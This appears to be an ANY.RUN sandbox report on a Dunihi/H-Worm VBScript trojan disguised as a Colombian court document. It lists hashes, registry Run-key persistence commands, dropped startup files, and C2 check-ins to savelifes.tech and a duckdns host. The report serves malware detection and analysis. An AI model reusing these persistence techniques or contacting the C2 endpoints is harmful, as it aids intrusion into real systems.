File name:

Juzgado 61 Administrativo Circuito #646862.vbe

Full analysis: https://app.any.run/tasks/35030967-22ae-4a05-aca1-fdd1c0efc59a
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: May 20, 2019, 22:58:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
dunihi
Indicators:
MIME: application/octet-stream
File info: data
MD5:

71ED0BF42E970573E9D0012CD21211E1

SHA1:

71CCBEBA75A06108634AFD3D397C7126CFA73CFE

SHA256:

965808A592A0643598544EF28B9A3ABD5677CD55B4390F5F86C9EFCB2B0A7481

SSDEEP:

1536:wyWCSEqiw0xbizetD7ajuI1mr6/lwK90IfjcTbr6/FFnMdNn1f5HQ+mdhWK0l:wyY9q7Gk2/lF0ogTbr6/FFnM7n163dYH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • WScript.exe (PID: 3288)
      • wscript.exe (PID: 3952)

    • Writes to a start menu file

      • wscript.exe (PID: 3952)
      • WScript.exe (PID: 3288)

    • DUNIHI was detected

      • wscript.exe (PID: 3952)

    • Connects to CnC server

      • wscript.exe (PID: 3952)

  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 3288)
      • wscript.exe (PID: 3952)

    • Application launched itself

      • WScript.exe (PID: 3288)

    • Executes scripts

      • WScript.exe (PID: 3288)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe #DUNIHI wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
3288"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3952"C:\Windows\System32\wscript.exe" //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"C:\Windows\System32\wscript.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
345
Read events
279
Write events
66
Delete events
0

Modification events

(PID) Process:(3288) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3288) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3952) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\BSxtKCnLwv
Operation:writeName:
Value:
false - 5/20/2019
(PID) Process:(3952) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:BSxtKCnLwv
Value:
wscript.exe //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"
(PID) Process:(3952) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:BSxtKCnLwv
Value:
wscript.exe //B "C:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbs"
(PID) Process:(3288) WScript.exeKey:HKEY_CURRENT_USER\Software\C4BA3647_Juzgado 61 Administrativo Circuito #646862
Operation:writeName:
Value:
false - 5/20/2019
(PID) Process:(3288) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Operation:writeName:ShowSuperHidden
Value:
0
(PID) Process:(3288) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Operation:writeName:HideFileExt
Value:
1
(PID) Process:(3288) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Juzgado 61 Administrativo Circuito #646862
Value:
wscript.exe //B "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"
(PID) Process:(3288) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Juzgado 61 Administrativo Circuito #646862
Value:
wscript.exe //B "C:\Users\admin\AppData\Local\Temp\Juzgado 61 Administrativo Circuito #646862.vbe"
Executable files
0
Suspicious files
1
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
3288WScript.exeC:\Users\admin\AppData\Roaming\BSxtKCnLwv.vbstext
MD5:
SHA256:
3288WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Juzgado 61 Administrativo Circuito #646862.vbebinary
MD5:
SHA256:
3952wscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BSxtKCnLwv.vbstext
MD5:
SHA256:
3288WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3288WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
18
DNS requests
3
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
malicious
3952
wscript.exe
POST
200
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
text
12 b
malicious
3952
wscript.exe
POST
200
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
text
12 b
malicious
3952
wscript.exe
POST
200
23.105.131.225:3456
http://savelifes.tech:3456/is-ready
US
text
12 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3952
wscript.exe
23.105.131.225:3456
savelifes.tech
Nobis Technology Group, LLC
US
malicious
3288
WScript.exe
191.88.248.244:7172
registroclient.duckdns.org
EPM Telecomunicaciones S.A. E.S.P.
CO
malicious
23.105.131.225:3456
savelifes.tech
Nobis Technology Group, LLC
US
malicious

DNS requests

Domain
IP
Reputation
savelifes.tech
  • 23.105.131.225
malicious
registroclient.duckdns.org
  • 191.88.248.244
malicious

Threats

PID
Process
Class
Message
3952
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
3952
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin UA
3952
wscript.exe
A Network Trojan was detected
MALWARE [PTsecurity] Dunihi VBS.Downloader.Trojan
1056
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1056
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3952
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
3952
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin UA
3952
wscript.exe
A Network Trojan was detected
MALWARE [PTsecurity] Dunihi VBS.Downloader.Trojan
3952
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
3952
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin UA
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Juzgado 61 Administrativo Circuito #646862.vbe